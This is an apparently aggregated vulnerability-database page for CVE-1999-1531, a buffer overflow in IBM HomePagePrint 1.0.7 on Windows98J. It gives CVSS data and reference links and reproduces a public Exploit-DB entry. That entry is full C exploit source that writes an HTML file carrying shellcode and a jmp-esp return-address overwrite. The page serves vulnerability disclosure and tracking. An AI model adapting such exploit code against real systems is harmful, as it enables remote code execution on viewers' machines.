CVE-1999-1531
CVSS7.5
Published: 1999-11-02 00:00:00
Revised: 2016-10-17 22:05:33

[Original] Buffer overflow in IBM HomePagePrint 1.0.7 for Windows98J allows a malicious Web site to execute arbitrary code on a viewer's system via a long IMG_SRC HTML tag.


[CNNVD] Windows98J IBM HomePagePrint buffer overflow vulnerability (CNNVD-199911-012)

        IBM HomePagePrint 1.0.7 for Windows98J contains a buffer overflow vulnerability. A malicious website can use a long IMG_SRC HTML tag to execute arbitrary code on the viewer's system.

- CVSS (base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1531
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-1531
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199911-012
(Official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=94157187815629&w=2
(UNKNOWN)  BUGTRAQ  19991102 Some holes for Win/UNIX softwares
http://www.iss.net/security_center/static/7767.php
(UNKNOWN)  XF  ibm-homepageprint-bo(7767)
http://www.securityfocus.com/bid/763
(VENDOR_ADVISORY)  BID  763

- Vulnerability information

Windows98J IBM HomePagePrint buffer overflow vulnerability
High severity  Buffer overflow
1999-11-02 00:00:00 2005-05-02 00:00:00
Remote
        IBM HomePagePrint 1.0.7 for Windows98J contains a buffer overflow vulnerability. A malicious website can use a long IMG_SRC HTML tag to execute arbitrary code on the viewer's system.

- Advisories and patches


- Vulnerability information (19588)

IBM HomePagePrint 1.0 7 Buffer Overflow Vulnerability (EDBID:19588)
windows remote
1999-11-02 Verified
0 UNYUN
N/A
source: http://www.securityfocus.com/bid/763/info

Certain versions of the IBM web page printout software "IBM HomePagePrint" can in some instances be remotely exploited by malicious web servers. The problem is a buffer overflow in the code that handles IMG SRC tags. If a page containing a specially constructed IMG SRC tag is previewed or printed using IBM HomePagePrint, arbitrary code can be run on the client.

/*=============================================================================
   IBM HomePagePrint Version 1.0.7 Exploit for Windows98
   The Shadow Penguin Security (http://shadowpenguin.backsection.net)
   Written by UNYUN (shadowpenguin@backsection.net)
  =============================================================================
*/

#include	<stdio.h>
#include	<windows.h>

#define		EXPLOIT_HTML	"exploit.html"
#define		HOST_ADDR		"http://www.geocities.co.jp/SiliconValley-SanJose/7479/"
#define		EIP				990
#define		JMPS_CODE		0xe9
#define		JMPS_OFS		0xfffff790

unsigned int mems[]={
0xbfb70000,0xbfbfc000,
0xbfde0000,0xbfde6000,
0xbfdf0000,0xbfdf5000,
0xbfe00000,0xbfe10000,
0xbfe30000,0xbfe43000,
0xbfe80000,0xbfe86000,
0xbfe90000,0xbfe96000,
0xbfea0000,0xbfeb0000,
0xbfee0000,0xbfee5000,
0xbff20000,0xbff47000,
0xbff50000,0xbff61000,
0xbff70000,0xbffc6000,
0xbffc9000,0xbffe3000,
0,0};

unsigned char exploit_code[200]={
0xEB,0x32,0x5B,0x53,0x32,0xE4,0x83,0xC3,
0x0B,0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,
0xBF,0xFF,0xD0,0x43,0x53,0x50,0x32,0xE4,
0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,
0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x43,0x53,
0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,
0xD6,0x90,0xEB,0xFD,0xE8,0xC9,0xFF,0xFF,
0xFF,0x00
};
unsigned char cmdbuf[200]="msvcrt.dll.system.notepad.exe";

unsigned int search_mem(FILE *fp,unsigned char *st,unsigned char *ed,
                unsigned char c1,unsigned char c2)
{
    unsigned char   *p;
	unsigned int	adr;

    for (p=st;p<ed;p++)
        if (*p==c1 && *(p+1)==c2){
			adr=(unsigned int)p;
			if ((adr&0xff)==0) continue;
			if (((adr>>8)&0xff)==0) continue;
			if (((adr>>16)&0xff)==0) continue;
			if (((adr>>24)&0xff)==0) continue;
			return(adr);
		}
	return(0);
}

int PASCAL WinMain(HINSTANCE hInst, HINSTANCE hInstPrev, LPSTR pszCmdLine, int CmdShow)
{
	FILE					*fp;
	unsigned int			i,ip,eip;
	static unsigned char	buf[30000];

	if ((fp=fopen(EXPLOIT_HTML,"wb"))==NULL) return FALSE;
	fprintf(fp,"<HTML><IMG SRC=\"");

	memset(buf,'a',2000); buf[2000]=0;
	for (i=0;i<50;i++) buf[i]=0x90;
	strcat(exploit_code,cmdbuf);
	memcpy(buf+50,exploit_code,strlen(exploit_code));

    for (i=0;;i+=2){
		if (mems[i]==0) return FALSE;
		if ((ip=search_mem(fp,(unsigned char *)mems[i],
			(unsigned char *)mems[i+1],0xff,0xe4))!=0) break;
    }

	eip=EIP-strlen(HOST_ADDR);
	buf[eip  ]=ip&0xff;
	buf[eip+1]=(ip>>8)&0xff;
	buf[eip+2]=(ip>>16)&0xff;
	buf[eip+3]=(ip>>24)&0xff;

	ip=JMPS_OFS;
	buf[eip+4]=JMPS_CODE;
	buf[eip+5]=ip&0xff;
	buf[eip+6]=(ip>>8)&0xff;
	buf[eip+7]=(ip>>16)&0xff;
	buf[eip+8]=(ip>>24)&0xff;

	fwrite(buf,2000,1,fp);

	fprintf(fp,"\"></HTML>");
	fclose(fp);
	return FALSE;
}


- Vulnerability information

1132
IBM HomePagePrint IMG_SRC Tag Handling Overflow
Context Dependent Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

- Timeline

1999-11-02 Unknown
1999-11-02 Unknown

- Solution

Products

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete